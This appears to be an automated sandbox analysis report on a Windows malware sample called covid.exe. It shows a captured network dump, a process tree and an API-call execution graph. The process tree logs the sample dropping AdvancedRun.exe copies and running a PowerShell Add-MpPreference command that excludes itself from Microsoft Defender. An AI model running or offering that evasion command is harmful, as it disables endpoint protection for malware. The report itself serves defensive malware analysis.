                                                                Data Raw: 62 36 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                Data Ascii: b61<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https


                                                                Code Manipulations

                                                                Statistics

                                                                CPU Usage


                                                                Memory Usage


                                                                High Level Behavior Distribution


                                                                Behavior


                                                                System Behavior

                                                                General

                                                                Start time:22:59:09
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\Desktop\covid.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\covid.exe'
                                                                Imagebase:0x460000
                                                                File size:39624 bytes
                                                                MD5 hash:99E3B458DEE79B33209D39D19692AE08
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                General

                                                                Start time:22:59:28
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                General

                                                                Start time:22:59:33
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:22:59:38
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
                                                                Imagebase:0xba0000
                                                                File size:430592 bytes
                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
                                                                Imagebase:0xba0000
                                                                File size:430592 bytes
                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff774ee0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff774ee0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:22:59:39
                                                                Start date:20/04/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                Imagebase:0x400000
                                                                File size:91000 bytes
                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

General

Start time: 22:59:52
Start date: 20/04/2021
Path: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis

Execution Graph

Execution Coverage: 10.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.1%
Total number of Nodes: 1983
Total number of Limit Nodes: 14

Graph

[execution_graph: node/edge data of the interactive execution-graph viewer (function addresses annotated with the APIs they call, among them EnumResourceNamesW, LoadLibraryW, GetProcAddress, OpenProcess, ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, AdjustTokenPrivileges, ImpersonateLoggedOnUser, CreateToolhelp32Snapshot, OpenSCManagerW, StartServiceW, ShellExecuteExW, SetEnvironmentVariableW and CoInitialize); graph listing omitted]
4937->4944 4939 408ce3 4938->4939 4947 40933d 4938->4947 4939->4890 4939->4893 4940 4094fb CloseHandle 4940->4939 4941 409377 memset memset 4941->4947 4942 40947d memset wcscpy 4943 409510 memcpy 4942->4943 4943->4944 4944->4939 4944->4940 4944->4942 4945 40920a 14 API calls 4945->4947 4947->4940 4947->4941 4947->4945 4948 40942e 4947->4948 4949 409510 4947->4949 4948->4940 4950 409520 4949->4950 4951 40954f 4949->4951 4950->4951 4952 40952e memcpy 4950->4952 4951->4947 4952->4951 4953 40b65c 4954 40b665 ??3@YAXPAX 4953->4954 4955 40b66c 4953->4955 4954->4955 4956 4070df 4957 4070f4 4956->4957 4958 40715b 4956->4958 4957->4958 4959 407102 memset 4957->4959 4960 407125 4959->4960 4960->4958 4961 407129 _snwprintf SendMessageW 4960->4961 4961->4958 4962 4030e0 4963 4030e9 4962->4963 4967 403107 4962->4967 4968 40304d memset wcscat 4963->4968 4965 4030f2 4966 404923 2 API calls 4965->4966 4965->4967 4966->4967 4969 40585c _wcsicmp 4968->4969 4970 403095 4969->4970 4970->4965 4971 4081e4 4972 4081f1 4971->4972 4973 407343 6 API calls 4972->4973 4974 408205 memset memset memset 4973->4974 4975 408276 4974->4975 4976 40825c _snwprintf 4974->4976 4977 408291 4975->4977 4978 40827e wcscpy 4975->4978 4976->4975 4986 407afd 4977->4986 4978->4977 4982 407343 6 API calls 4983 4082ec 4982->4983 4984 4082fa 4983->4984 4991 407d03 ??2@YAPAXI 4983->4991 4987 40b550 4986->4987 4988 407b0a _snwprintf 4987->4988 4989 407343 6 API calls 4988->4989 4990 407b57 _snwprintf 4989->4990 4990->4982 4992 407d28 4991->4992 4995 407b5d 4992->4995 4996 40b550 4995->4996 4997 407b6a memset memset memset 4996->4997 4998 407be4 4997->4998 4999 407bbb 4997->4999 5001 407c24 _snwprintf 4998->5001 5013 40adc0 _snwprintf 4998->5013 5012 40adc0 _snwprintf 4999->5012 5004 407343 6 API calls 5001->5004 5002 407bca _snwprintf 5002->4998 5008 407c56 5004->5008 5005 407bf9 _snwprintf wcscpy 5005->5001 5006 407cfc ??3@YAXPAX 5006->4984 5007 407c6b memset 5007->5008 5009 407c8a _snwprintf 5007->5009 5008->5006 
5008->5007 5010 407cad _snwprintf 5008->5010 5009->5010 5011 407343 6 API calls 5010->5011 5011->5008 5012->5002 5013->5005 5014 40a7e5 5015 40a826 5014->5015 5016 40a7ef 5014->5016 5017 40a80a 5016->5017 5020 406bba 5016->5020 5017->5015 5019 40a81b EndDialog 5017->5019 5019->5015 5021 406c08 5020->5021 5031 406bc7 5020->5031 5021->5031 5032 40331d SendMessageW 5021->5032 5024 406cc3 5024->5017 5025 406c5a 5026 406c85 5025->5026 5033 403331 SendMessageW 5025->5033 5034 40331d SendMessageW 5026->5034 5029 406c9f 5035 403331 SendMessageW 5029->5035 5036 406b82 5031->5036 5032->5025 5033->5025 5034->5029 5035->5031 5037 406ba0 SendMessageW 5036->5037 5038 406b91 5036->5038 5037->5024 5043 40844d 5038->5043 5042 406b9e 5042->5024 5047 408473 5043->5047 5044 4084d3 5045 408502 5044->5045 5050 4084e5 5044->5050 5046 40851a qsort 5045->5046 5048 406b99 5046->5048 5047->5044 5055 4083dc ??2@YAPAXI 5047->5055 5052 406e57 5048->5052 5051 4083dc 5 API calls 5050->5051 5051->5048 5060 406842 5052->5060 5056 4083f8 5055->5056 5057 40843f ??3@YAXPAX 5055->5057 5058 40840c memcpy memcpy memcpy 5056->5058 5057->5044 5058->5058 5059 40843e 5058->5059 5059->5057 5063 4033e7 SendMessageW 5060->5063 5062 40684d SendMessageW 5062->5042 5063->5062 5064 40b6e7 5065 40b6f0 FreeLibrary 5064->5065 5066 40b6f7 5064->5066 5065->5066 5067 40a9ea 5068 40aa06 5067->5068 5069 4095fd 49 API calls 5068->5069 5070 40aa0c 5069->5070 5081 4097a9 5070->5081 5072 40aabf 5073 4095da 2 API calls 5072->5073 5075 40aac8 5073->5075 5074 40aa2f GetCurrentProcessId 5079 40aa16 5074->5079 5077 404923 2 API calls 5077->5079 5078 409a94 23 API calls 5078->5079 5079->5072 5079->5074 5079->5077 5079->5078 5094 40a909 5079->5094 5097 40715e 5079->5097 5082 4097b6 5081->5082 5107 408e31 5082->5107 5086 408e31 13 API calls 5088 409815 5086->5088 5087 4098e9 ??3@YAXPAX 5087->5079 5088->5087 5089 404923 2 API calls 5088->5089 5090 404923 2 API calls 5088->5090 5091 40987d memcpy 5089->5091 5092 4098b6 memcpy 5090->5092 
5091->5088 5093 4099ed 4 API calls 5092->5093 5093->5088 5110 404fa4 memset 5094->5110 5096 40a927 5096->5079 5099 4071a4 5097->5099 5105 407170 5097->5105 5098 4071cd 5100 4071f1 free 5098->5100 5101 407215 5098->5101 5099->5098 5102 4071fa memcpy 5099->5102 5103 407227 5100->5103 5104 404951 3 API calls 5101->5104 5102->5105 5106 407231 memcpy 5103->5106 5104->5103 5105->5079 5106->5105 5108 408f29 ??2@YAPAXI memset 5107->5108 5109 408e3e 13 API calls 5107->5109 5108->5086 5109->5108 5110->5096 5111 4041eb 5112 40420a memset DragQueryFileW DragFinish 5111->5112 5120 404264 5111->5120 5114 40424d 5112->5114 5113 40427b BeginDeferWindowPos 5150 402e22 GetDlgItem GetClientRect 5113->5150 5117 404923 2 API calls 5114->5117 5115 4043ba 5123 4043c8 5115->5123 5154 402ec8 6 API calls 5115->5154 5117->5120 5120->5113 5120->5115 5121 402e22 3 API calls 5122 4042aa 5121->5122 5124 402e22 3 API calls 5122->5124 5125 4042bd 5124->5125 5126 402e22 3 API calls 5125->5126 5127 4042d0 5126->5127 5128 402e22 3 API calls 5127->5128 5129 4042e3 5128->5129 5130 402e22 3 API calls 5129->5130 5131 4042f6 5130->5131 5132 402e22 3 API calls 5131->5132 5133 404309 5132->5133 5134 402e22 3 API calls 5133->5134 5135 40431c 5134->5135 5136 402e22 3 API calls 5135->5136 5137 40432f 5136->5137 5138 402e22 3 API calls 5137->5138 5139 404342 5138->5139 5140 402e22 3 API calls 5139->5140 5141 404355 5140->5141 5142 402e22 3 API calls 5141->5142 5143 404368 5142->5143 5144 402e22 3 API calls 5143->5144 5145 40437b 5144->5145 5146 402e22 3 API calls 5145->5146 5147 40438e 5146->5147 5148 402e22 3 API calls 5147->5148 5149 4043a1 EndDeferWindowPos InvalidateRect 5148->5149 5149->5123 5151 402e56 5150->5151 5152 402ebb 5151->5152 5153 402e6b DeferWindowPos 5151->5153 5152->5121 5153->5152 5154->5123 5158 407ef0 5159 407f7f 5158->5159 5160 407f06 5158->5160 5160->5159 5161 407f37 wcscmp 5160->5161 5162 407f3e _wcsicmp 5160->5162 5164 40488d 3 API calls 5160->5164 5165 404835 wcslen wcslen 5160->5165 
5161->5160 5162->5160 5164->5160 5166 404880 5165->5166 5167 40485c 5165->5167 5166->5160 5167->5166 5168 404864 memcmp 5167->5168 5168->5166 5168->5167 5169 403a73 5170 403afa CallWindowProcW 5169->5170 5171 403a7f 5169->5171 5171->5170 5172 403a85 GetKeyState 5171->5172 5186 403a60 GetKeyState 5172->5186 5174 403a98 5175 403aa8 5174->5175 5187 403a60 GetKeyState 5174->5187 5175->5170 5188 403a60 GetKeyState 5175->5188 5178 403ab7 5178->5170 5189 403a60 GetKeyState 5178->5189 5180 403ac6 5180->5170 5190 403a60 GetKeyState 5180->5190 5182 403ad5 5182->5170 5191 403a60 GetKeyState 5182->5191 5184 403ae4 5184->5170 5185 403ae9 SendMessageW 5184->5185 5185->5170 5186->5174 5187->5175 5188->5178 5189->5180 5190->5182 5191->5184 5192 40b477 _XcptFilter 5193 403377 SendMessageW 5194 403396 5193->5194 5196 4033ab 5193->5196 5194->5196 5197 4032f6 SendMessageW 5194->5197 5197->5196 5198 405cf8 5199 405d55 5198->5199 5200 405d08 GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 5198->5200 5201 405d61 5199->5201 5203 404fbb GetWindowLongW SetWindowLongW 5199->5203 5200->5199 5203->5201 5207 40a17b 5210 409d5f 5207->5210 5209 40a19f 5211 409d6c 5210->5211 5212 409d72 5211->5212 5213 409dc4 GetPrivateProfileStringW 5211->5213 5214 409db2 5212->5214 5215 409d76 wcschr 5212->5215 5213->5209 5217 409db6 WritePrivateProfileStringW 5214->5217 5215->5214 5216 409d84 _snwprintf 5215->5216 5216->5217 5217->5209 5218 407d80 memset memset 5219 407dc9 5218->5219 5220 407343 6 API calls 5219->5220 5221 407ddd 5220->5221 5222 407250 2 API calls 5221->5222 5223 407df0 _snwprintf 5222->5223 5224 407343 6 API calls 5223->5224 5225 407e1d 5224->5225 5226 40ac81 memset 5227 40acae 5226->5227 5230 40acc5 5226->5230 5228 40acb1 SHGetPathFromIDListW 5227->5228 5229 40acf6 5227->5229 5228->5229 5228->5230 5230->5229 5231 40aced SendMessageW 5230->5231 5231->5229 5232 408182 5233 4081a2 5232->5233 5234 408193 5232->5234 5235 4081ba 5233->5235 5237 407343 6 API calls 5233->5237 5236 
407343 6 API calls 5234->5236 5238 407343 6 API calls 5235->5238 5236->5233 5237->5235 5239 4081d7 5238->5239 5240 408382 5241 408397 5240->5241 5242 4083ac 5241->5242 5244 408301 5241->5244 5246 40830e 5244->5246 5245 408377 5245->5241 5246->5245 5247 40836f _wcsicmp 5246->5247 5247->5245 5248 403c03 5321 403b3c memset memset 5248->5321 5252 403c16 DragAcceptFiles GetDlgItem SetWindowLongW 5336 402ddd GetClientRect GetWindow GetWindow 5252->5336 5256 403cb8 GetDlgItem 5257 40ad85 10 API calls 5256->5257 5258 403cca GetDlgItem 5257->5258 5259 405b81 16 API calls 5258->5259 5260 403ce4 5259->5260 5346 4049d9 SendMessageW SendMessageW 5260->5346 5262 403ceb 5263 405b81 16 API calls 5262->5263 5264 403cf6 5263->5264 5347 4049d9 SendMessageW SendMessageW 5264->5347 5266 403cfd 5267 405b81 16 API calls 5266->5267 5268 403d0f 5267->5268 5348 4049d9 SendMessageW SendMessageW 5268->5348 5270 403d16 5271 405b81 16 API calls 5270->5271 5272 403d24 5271->5272 5349 4049d9 SendMessageW SendMessageW 5272->5349 5274 403d2b 5275 405b81 16 API calls 5274->5275 5276 403d3d 5275->5276 5350 4049d9 SendMessageW SendMessageW 5276->5350 5278 403d44 5279 405b81 16 API calls 5278->5279 5280 403d52 5279->5280 5351 4049d9 SendMessageW SendMessageW 5280->5351 5282 403d59 GetDlgItem 5283 405b81 16 API calls 5282->5283 5284 403d74 5283->5284 5352 4049d9 SendMessageW SendMessageW 5284->5352 5286 403d7b 5287 405b81 16 API calls 5286->5287 5288 403d86 5287->5288 5353 4049d9 SendMessageW SendMessageW 5288->5353 5290 403d8d 5291 405b81 16 API calls 5290->5291 5292 403d9c 5291->5292 5354 4049d9 SendMessageW SendMessageW 5292->5354 5294 403da3 5295 405b81 16 API calls 5294->5295 5296 403dae 5295->5296 5355 4049d9 SendMessageW SendMessageW 5296->5355 5298 403db5 GetDlgItem 5299 403dc9 5298->5299 5300 405b81 16 API calls 5299->5300 5302 403de8 GetDlgItem 5299->5302 5356 4049d9 SendMessageW SendMessageW 5299->5356 5300->5299 5303 403df9 5302->5303 5304 405b81 16 API calls 5303->5304 5306 403e18 
GetDlgItem 5303->5306 5357 4049d9 SendMessageW SendMessageW 5303->5357 5304->5303 5307 403e28 5306->5307 5308 405b81 16 API calls 5307->5308 5310 403e47 GetDlgItem 5307->5310 5358 4049d9 SendMessageW SendMessageW 5307->5358 5308->5307 5311 403e57 5310->5311 5312 405b81 16 API calls 5311->5312 5314 403e76 SendDlgItemMessageW 5311->5314 5359 4049d9 SendMessageW SendMessageW 5311->5359 5312->5311 5360 403ec3 5314->5360 5319 402bee 7 API calls 5320 403eb4 5319->5320 5385 404ad9 GetModuleFileNameW 5321->5385 5323 403b87 _snwprintf 5324 404923 2 API calls 5323->5324 5325 403bbe 5324->5325 5326 404923 2 API calls 5325->5326 5327 403bd3 5326->5327 5328 404923 2 API calls 5327->5328 5329 403bea 5328->5329 5386 40467a 5329->5386 5332 403b16 5333 403b25 5332->5333 5334 405b81 16 API calls 5333->5334 5335 403b2b SetDlgItemTextW 5334->5335 5335->5252 5337 402e0e 5336->5337 5396 402d99 GetWindowRect MapWindowPoints 5337->5396 5339 402e13 GetWindow 5339->5337 5340 402e1e 7 API calls 5339->5340 5341 40ad85 5340->5341 5342 405436 8 API calls 5341->5342 5343 40ad93 GetProcAddress 5342->5343 5344 40adb4 FreeLibrary 5343->5344 5345 40ada7 5343->5345 5344->5256 5345->5344 5346->5262 5347->5266 5348->5270 5349->5274 5350->5278 5351->5282 5352->5286 5353->5290 5354->5294 5355->5298 5356->5299 5357->5303 5358->5307 5359->5311 5397 402a89 GetDlgItem EnableWindow 5360->5397 5362 403ed6 5398 402a89 GetDlgItem EnableWindow 5362->5398 5364 403ee8 5399 402a89 GetDlgItem EnableWindow 5364->5399 5366 403f03 5400 402a89 GetDlgItem EnableWindow 5366->5400 5368 403f18 5401 402a89 GetDlgItem EnableWindow 5368->5401 5370 403f3d 5402 402a89 GetDlgItem EnableWindow 5370->5402 5372 403f61 5403 402a89 GetDlgItem EnableWindow 5372->5403 5374 403f85 5404 402a89 GetDlgItem EnableWindow 5374->5404 5376 403f9e 5405 402a89 GetDlgItem EnableWindow 5376->5405 5378 403fb7 5406 402a89 GetDlgItem EnableWindow 5378->5406 5380 403e92 GetDlgItem SetFocus 5381 402d78 5380->5381 5382 402d82 5381->5382 5383 404da9 10 API 
calls 5382->5383 5384 402d93 5383->5384 5384->5319 5385->5323 5392 4043f8 5386->5392 5389 403bf4 5389->5332 5390 40469b memset _snwprintf RegOpenKeyExW 5390->5389 5391 4046f0 RegCloseKey 5390->5391 5391->5389 5395 409eb3 RegOpenKeyExW 5392->5395 5394 40440f 5394->5389 5394->5390 5395->5394 5396->5339 5397->5362 5398->5364 5399->5366 5400->5368 5401->5370 5402->5372 5403->5374 5404->5376 5405->5378 5406->5380 5407 40b688 5410 401a2f 5407->5410 5411 4055d1 free 5410->5411 5412 401a3d 5411->5412 5413 406f09 5414 406f6f 5413->5414 5415 406f1f 5413->5415 5417 406842 SendMessageW 5414->5417 5416 406f4d SendMessageW 5415->5416 5431 407075 5416->5431 5428 406fa9 5417->5428 5419 406f6a 5420 407042 5420->5419 5422 407058 5420->5422 5425 407075 11 API calls 5420->5425 5422->5419 5457 40684f 5422->5457 5423 40700d 5423->5420 5451 406e8a 5423->5451 5424 406fcb SendMessageW 5424->5428 5425->5422 5428->5423 5428->5424 5435 406ccb 5428->5435 5439 406dea 5428->5439 5445 406d44 5428->5445 5432 407087 5431->5432 5433 406bba 11 API calls 5432->5433 5434 407094 5433->5434 5434->5419 5436 406ce1 5435->5436 5438 406cdc 5435->5438 5437 4031e2 SendMessageW 5436->5437 5437->5438 5438->5428 5440 406e51 5439->5440 5443 406df7 5439->5443 5440->5428 5442 406e22 wcscmp 5442->5443 5443->5440 5443->5442 5460 403421 SendMessageW 5443->5460 5461 4033fb SendMessageW 5443->5461 5446 406d56 5445->5446 5462 4032f6 SendMessageW 5446->5462 5448 406dae 5449 406de1 5448->5449 5463 4032b5 SendMessageW 5448->5463 5449->5428 5452 406e9c 5451->5452 5464 40325c 5452->5464 5454 406ef9 5455 406dea 3 API calls 5454->5455 5456 406f03 5455->5456 5456->5423 5467 4031bc SendMessageW 5457->5467 5459 406866 5459->5419 5460->5443 5461->5443 5462->5448 5463->5449 5465 403283 wcslen 5464->5465 5466 40328d SendMessageW 5464->5466 5465->5466 5466->5454 5467->5459 5468 40b48b 5469 40b497 _exit 5468->5469 5470 40b49e _c_exit 5468->5470 5469->5470 5471 40b4a4 5470->5471 5472 40620e 5473 40621b 5472->5473 5474 406224 5473->5474 
5480 40625f 5473->5480 5489 405e8d 5474->5489 5476 40632d 5477 40622f LoadMenuW 5496 40605e 5477->5496 5478 405e8d 2 API calls 5481 406294 CreateDialogParamW 5478->5481 5480->5476 5480->5478 5483 4062b2 GetDesktopWindow CreateDialogParamW 5481->5483 5484 4062c6 memset GetWindowTextW 5481->5484 5483->5484 5485 406300 5484->5485 5486 406315 EnumChildWindows DestroyWindow 5484->5486 5487 405fac 3 API calls 5485->5487 5486->5476 5488 406312 5487->5488 5488->5486 5490 405e9d 5489->5490 5492 405e92 _snwprintf 5489->5492 5490->5492 5493 405ebb 5490->5493 5492->5477 5494 405ed0 wcscpy 5493->5494 5495 405edc 5493->5495 5494->5495 5495->5477 5497 40b550 5496->5497 5498 40606e GetMenuItemCount 5497->5498 5499 406148 DestroyMenu 5498->5499 5500 406088 memset GetMenuItemInfoW 5498->5500 5499->5476 5503 4060d9 5500->5503 5501 4060e0 wcschr 5501->5503 5502 40605e 5 API calls 5502->5503 5503->5499 5503->5500 5503->5501 5503->5502 5504 406025 5 API calls 5503->5504 5504->5503 5511 40a10f WritePrivateProfileStringW 5512 40b590 5513 40b23c 2 API calls 5512->5513 5514 40b59a 5513->5514 5518 401093 5519 401270 5518->5519 5520 4010ab 5518->5520 5521 4012a6 SetDlgItemTextW 5519->5521 5522 40127a GetDlgItem ShowWindow GetDlgItem ShowWindow 5519->5522 5523 401231 5520->5523 5524 4010b2 5520->5524 5525 4012b9 SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5521->5525 5522->5525 5528 401252 EndDialog DeleteObject 5523->5528 5547 401113 5523->5547 5526 4011d3 GetDlgItem 5524->5526 5527 4010bb 5524->5527 5549 40103e 5525->5549 5530 4011e8 SetBkMode SetTextColor GetSysColorBrush 5526->5530 5531 40120e 5526->5531 5532 401151 GetDlgItem ChildWindowFromPoint 5527->5532 5533 4010c6 5527->5533 5528->5519 5530->5547 5538 40121c GetDlgItem 5531->5538 5531->5547 5534 4011a4 5532->5534 5535 401187 GetModuleHandleW LoadCursorW SetCursor 5532->5535 5537 4010ce GetDlgItem ChildWindowFromPoint 5533->5537 5533->5547 5539 4011b2 GetDlgItem ChildWindowFromPoint 5534->5539 5534->5547 5535->5547 5541 401104 
5537->5541 5542 40111d 5537->5542 5543 40122f 5538->5543 5538->5547 5545 4011d1 5539->5545 5539->5547 5540 404da9 10 API calls 5540->5547 5548 404f7e ShellExecuteW 5541->5548 5544 40112b GetDlgItem ChildWindowFromPoint 5542->5544 5542->5547 5543->5530 5544->5541 5544->5547 5545->5535 5548->5547 5554 404aeb memset wcscpy 5549->5554 5551 40104d CreateFontIndirectW SendDlgItemMessageW 5552 401090 5551->5552 5553 40107c SendDlgItemMessageW 5551->5553 5552->5540 5553->5552 5554->5551 5555 407294 5556 4072a3 5555->5556 5559 404c96 5556->5559 5560 404cac 5559->5560 5568 404ca5 5559->5568 5569 404c70 modf 5560->5569 5562 404cd7 5570 404c70 modf 5562->5570 5564 404d39 5571 404c70 modf 5564->5571 5566 404d63 5572 404c70 modf 5566->5572 5569->5562 5570->5564 5571->5566 5572->5568 5573 402b16 5576 408dc8 5573->5576 5575 402b24 5577 408dd4 5576->5577 5578 408dd9 memcpy memcpy GetModuleHandleW DialogBoxParamW 5576->5578 5577->5575 5578->5575 5579 40b217 _onexit 5580 40a998 5581 40a9bc 5580->5581 5582 40a99f 5580->5582 5581->5582 5583 40a9c3 CompareFileTime 5581->5583 5583->5582 5587 402b9c 5588 405ce7 GetModuleHandleW 5587->5588 5589 402bb7 CreateDialogParamW 5588->5589 5594 405e0a 5589->5594 5595 405e17 5594->5595 5596 402bc8 5595->5596 5597 405e2e memset 5595->5597 5604 405d6a 5596->5604 5598 405e8d 2 API calls 5597->5598 5599 405e52 5598->5599 5600 405f39 3 API calls 5599->5600 5601 405e63 5600->5601 5602 405e7a EnumChildWindows 5601->5602 5603 405e6a SetWindowTextW 5601->5603 5602->5596 5603->5602 5605 405d76 5604->5605 5606 402bd0 ShowWindow UpdateWindow 5604->5606 5607 405d91 5605->5607 5608 405d89 EnumChildWindows 5605->5608 5609 405d97 EnumChildWindows 5607->5609 5610 405d9f 5607->5610 5608->5607 5609->5610 5612 404fbb GetWindowLongW SetWindowLongW 5610->5612 5612->5606 5613 409f9c 5614 40a03c memset memset memset _snwprintf _snwprintf 5613->5614 5615 409fbc memset memset _snwprintf _snwprintf 5613->5615 5616 40a037 5614->5616 5615->5616 5620 4038a3 5621 4038c3 
